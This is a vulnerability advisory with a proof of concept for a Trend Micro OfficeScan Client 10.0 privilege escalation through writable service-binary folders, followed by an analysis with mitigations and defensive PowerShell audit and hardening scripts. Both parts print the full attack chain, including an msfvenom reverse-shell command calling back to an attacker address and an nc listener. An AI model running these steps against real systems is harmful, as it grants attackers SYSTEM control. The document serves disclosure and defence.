Trend Micro OfficeScan Client 10.0 - ACL Service LPE

Exploit Author: msd0pe
Analysis Author: www.bubbleslearn.ir
Category: Local
Language: Shell
Published Date: 2023-05-23

#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
#  Date: 2023/05/04
#  Exploit Author: msd0pe
#  Vendor Homepage: https://www.trendmicro.com
#  My Github: https://github.com/msd0pe-1


Trend Micro OfficeScan Client:
Versions <= 10.0 ship with incorrect ACL rights on the OfficeScan client folder, which allows attackers to escalate privileges to SYSTEM level through the services. This vulnerability does not need any privileged access.

[1] Verify the folder rights:
    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                         NT AUTHORITY\SYSTEM:(F)
                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                         BUILTIN\Administrators:(F)
                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                         BUILTIN\Users:(F)
                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)

[2] Get information about the services:
    > sc qc tmlisten

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: tmlisten
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT Listener
            DEPENDENCIES       : Netman
                               : WinMgmt
            SERVICE_START_NAME : LocalSystem

OR

    > sc qc ntrtscan

    SERVICE_NAME: ntrtscan
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT RealTime Scan
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

    OR

    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe

[4] Upload the reverse shell to C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe

[5] Start listener
    > nc -lvp 4444

[6] Reboot the service/server
    > sc stop tmlisten
    > sc start tmlisten
    
    OR
    
    > sc stop ntrtscan
    > sc start ntrtscan

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system


Trend Micro OfficeScan Client 10.0 - ACL Service LPE: A Critical Privilege Escalation Vulnerability

Security researchers have identified a severe privilege escalation vulnerability in Trend Micro OfficeScan Client, affecting version 10.0 and earlier. This flaw stems from improper access control list (ACL) permissions on the application's installation directory, enabling attackers to escalate from a low-privileged user to LocalSystem, the highest privilege level on Windows systems, without needing any rights beyond a standard user account.

Root Cause: Misconfigured ACL Permissions

The vulnerability arises due to a critical misconfiguration in the file system permissions of the C:\Program Files (x86)\Trend Micro\OfficeScan Client directory. While the intended security model restricts access to trusted system components, the actual ACL grants full write permissions to the BUILTIN\Users group.

icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

This command reveals the ACL configuration, showing that BUILTIN\Users has (F)—full control—rights on the directory, including inheritance and propagation. This is a glaring security oversight, as it allows any standard user to modify or replace executable files within the folder.

Exploitable Services: tmlisten and ntrtscan

Two key services—tmlisten and ntrtscan—are directly exploitable due to their configuration and reliance on the vulnerable directory:

  • tmlisten: OfficeScan NT Listener, running under LocalSystem with automatic startup.
  • ntrtscan: OfficeScan NT RealTime Scan, also running under LocalSystem with no dependencies.

Both services are configured to load their binary from the vulnerable directory. Their SERVICE_START_NAME is set to LocalSystem, meaning they execute with elevated privileges, making them prime targets for exploitation.

sc qc tmlisten

Output shows:

    Property             Value
    BINARY_PATH_NAME     "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
    SERVICE_START_NAME   LocalSystem
    START_TYPE           AUTO_START

Similarly, ntrtscan follows the same pattern, making it equally exploitable.
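The pattern described in the two sections above, a service that runs as LocalSystem from a directory that standard users can write to, is not specific to OfficeScan and can be audited across every service on a host. The following PowerShell script is an added example written for this page, not code from the advisory or from Trend Micro. The list of low-privilege principals and the set of rights it treats as write-capable are this example's choices; it should be run from an elevated prompt so that Get-Acl can read every directory.

```powershell
# Audit Win32 services for binaries that run as LocalSystem from files or
# folders that low-privileged principals can write to (the OfficeScan client
# folder pattern). Added example for this page; the principal list and the
# right mask below are assumptions, not values from the advisory.

$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Specific rights that let a caller create, replace or delete files, or rewrite the ACL itself.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
# Generic bits (GENERIC_ALL, GENERIC_WRITE) that Windows keeps on inherit-only ACEs such as (OI)(CI)(IO)(F).
$GenericMask = 0x10000000 -bor 0x40000000

function Test-WeakAce {
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    if ($Ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { return $false }
    if ($LowPrivPrincipals -notcontains $Ace.IdentityReference.Value) { return $false }
    $mask = [int]$Ace.FileSystemRights
    return (($mask -band $WriteMask) -ne 0) -or (($mask -band $GenericMask) -ne 0)
}

function Get-ServiceExePath {
    param([string]$PathName)
    # Win32_Service.PathName may be quoted and may carry arguments; keep only the executable.
    if (-not $PathName) { return $null }
    $m = [regex]::Match($PathName, '^\s*"?([^"]+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $null
}

function Find-WritableSystemServiceBinaries {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        # The advisory's services run as LocalSystem; that is the case worth flagging.
        if ($svc.StartName -ne 'LocalSystem') { continue }
        $exe = Get-ServiceExePath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        $dir = Split-Path -Parent $exe
        # Check both the binary itself and its folder: full control on the folder
        # is enough to delete and replace the binary even if the file ACL is strict.
        foreach ($target in @($exe, $dir)) {
            try { $acl = Get-Acl -LiteralPath $target -ErrorAction Stop } catch { continue }
            foreach ($ace in $acl.Access) {
                if (Test-WeakAce $ace) {
                    [pscustomobject]@{
                        Service   = $svc.Name
                        RunsAs    = $svc.StartName
                        Target    = $target
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                        Inherited = $ace.IsInherited
                    }
                }
            }
        }
    }
}

Find-WritableSystemServiceBinaries | Sort-Object Service, Target, Principal -Unique | Format-Table -AutoSize
```

On a host with the ACL shown in step [1] of the PoC, the report contains rows for tmlisten and ntrtscan with Principal BUILTIN\Users and Rights FullControl on both the executable and the folder; on a correctly configured host, nothing under Program Files should appear. Inherit-only entries on the folder are reported as well, because they decide the permissions of any file created inside it.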

Exploit Execution: Step-by-Step Attack

Attackers can leverage this vulnerability to execute arbitrary code with system-level privileges. Here’s a detailed breakdown of the exploit chain:

Step 1: Generate Malicious Payload

Using Metasploit, an attacker generates a reverse shell executable tailored for Windows x64:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

This command produces a malicious tmlisten.exe that connects back to the attacker's machine when executed. Whether it is detected depends on the endpoint protection in place and how it is configured.

Step 2: Upload and Replace the Service Binary

With write access to the vulnerable directory, the attacker uploads the malicious executable:

  • Copy tmlisten.exe or ntrtscan.exe to C:\Program Files (x86)\Trend Micro\OfficeScan Client.
  • Replace the original legitimate binary with the malicious version.

Since Users have full control, this operation is trivial and requires no additional privileges.

Step 3: Trigger Service Restart

After replacing the binary, the attacker restarts the service:

sc stop tmlisten
sc start tmlisten

Alternatively, a reboot can trigger the service restart:

shutdown /r

When the service starts, it loads the malicious executable instead of the original, executing it under LocalSystem context.

Step 4: Establish Reverse Shell

On the attacker’s machine, a netcat listener is set up:

nc -lvp 4444

Upon successful execution, the reverse shell connects back:

connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Result: the attacker gains full system access, enabling complete control over the target machine.

Security Implications and Real-World Impact

This vulnerability is particularly dangerous in enterprise environments where OfficeScan is widely deployed. It allows:

  • Unprivileged users to gain system-level access.
  • Attackers to bypass security controls without needing initial exploits.
  • Malware persistence through service binaries.

Furthermore, since the services are set to auto-start, the malicious payload runs again automatically after every reboot, giving the attacker persistence that blends in with expected service activity and is easy to overlook.

Expert Recommendations and Mitigations

Organizations must take immediate action to prevent exploitation:

  • Upgrade to OfficeScan Client 10.1 or later—the vulnerability has been patched in newer versions.
  • Restrict ACL permissions on the OfficeScan directory to only TrustedInstaller and SYSTEM.
  • Monitor service binaries for unexpected changes using file integrity monitoring (FIM) tools.
  • Disable auto-start services if not required, or use application whitelisting to prevent unauthorized binaries.

Additionally, security teams should conduct regular audits of service configurations and file permissions—especially on legacy software with long-term deployment.
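Two of the recommendations above, restricting the folder ACL and monitoring the service binaries for unexpected changes, can be put into practice with a short PowerShell script. The following is an added example written for this page, not Trend Micro's fix and not code from the advisory. It takes the smaller step of removing every write-capable right from BUILTIN\Users rather than reducing the ACL to TrustedInstaller and SYSTEM, then records a SHA-256 baseline of the executables so later replacement shows up; $ClientDir is the folder named in the advisory, $BaselinePath and all function names are this example's assumptions, and it must run from an elevated prompt.

```powershell
# Added example for this page (not the vendor's fix): strip write-capable rights
# for BUILTIN\Users from the OfficeScan client folder, then record and later
# verify a SHA-256 baseline of its executables. Run from an elevated prompt.
# $ClientDir is the folder from the advisory; $BaselinePath is an assumed location.
$ClientDir    = 'C:\Program Files (x86)\Trend Micro\OfficeScan Client'
$BaselinePath = 'C:\ProgramData\OfficeScanClient-baseline.json'

# Rights that would still let a standard user replace or alter a service binary.
$WriteLikeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Repair-ClientDirAcl {
    param([string]$Dir)
    # Stop inheriting from the parent folder while keeping copies of the current
    # entries (/inheritance:d), drop every right granted to Users, then re-grant
    # read and execute only, propagating to subfolders and files (/T) and
    # continuing past errors (/C).
    & icacls $Dir /inheritance:d | Out-Null
    & icacls $Dir /remove:g 'BUILTIN\Users' /T /C | Out-Null
    & icacls $Dir /grant:r 'BUILTIN\Users:(OI)(CI)(RX)' /T /C | Out-Null
    # Confirm: return any Users entry on the folder that still carries a write-like right.
    (Get-Acl -LiteralPath $Dir).Access |
        Where-Object { $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
                       (([int]$_.FileSystemRights) -band $WriteLikeMask) -ne 0 }
}

function Get-ClientBinaryHashes {
    param([string]$Dir)
    Get-ChildItem -LiteralPath $Dir -Recurse -File |
        Where-Object { $_.Extension -in '.exe', '.dll' } |
        ForEach-Object {
            [pscustomobject]@{
                Path   = $_.FullName
                Sha256 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            }
        }
}

function Save-ClientBaseline {
    param([string]$Dir, [string]$OutFile)
    # -InputObject keeps a single-element result serialized as a JSON array.
    ConvertTo-Json -InputObject @(Get-ClientBinaryHashes -Dir $Dir) | Set-Content -LiteralPath $OutFile
}

function Compare-ClientBaseline {
    param([string]$Dir, [string]$BaselineFile)
    $known = @{}
    foreach ($e in @(Get-Content -LiteralPath $BaselineFile -Raw | ConvertFrom-Json)) { $known[$e.Path] = $e.Sha256 }
    $seen = @{}
    foreach ($f in Get-ClientBinaryHashes -Dir $Dir) {
        $seen[$f.Path] = $true
        if (-not $known.ContainsKey($f.Path)) {
            [pscustomobject]@{ Path = $f.Path; Status = 'NEW' }
        } elseif ($known[$f.Path] -ne $f.Sha256) {
            # A swapped tmlisten.exe or ntrtscan.exe lands here.
            [pscustomobject]@{ Path = $f.Path; Status = 'MODIFIED' }
        }
    }
    foreach ($p in $known.Keys) {
        if (-not $seen.ContainsKey($p)) { [pscustomobject]@{ Path = $p; Status = 'MISSING' } }
    }
}

# Usage: harden once, take the baseline, and re-run the comparison on a schedule.
Repair-ClientDirAcl -Dir $ClientDir
Save-ClientBaseline -Dir $ClientDir -OutFile $BaselinePath
Compare-ClientBaseline -Dir $ClientDir -BaselineFile $BaselinePath | Format-Table -AutoSize
```

Repair-ClientDirAcl returns nothing when the cleanup succeeded and echoes any leftover write-capable Users entry otherwise. Keep the baseline file somewhere standard users cannot modify, refresh it after legitimate product updates, and treat a MODIFIED or NEW result for a service binary as an incident to investigate rather than a false positive to suppress.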

Conclusion: A Wake-Up Call for Secure Software Deployment

The Trend Micro OfficeScan Client 10.0 ACL Service LPE vulnerability exemplifies how a seemingly minor permission misconfiguration can lead to catastrophic security breaches. It underscores the importance of:

  • Principle of least privilege in file system access.
  • Regular security audits of installed software.
  • Defense-in-depth strategies, including service monitoring and binary integrity checks.

As cyberattacks grow in sophistication, vulnerabilities like this serve as a reminder that even trusted security software can become a vector for compromise if not properly secured.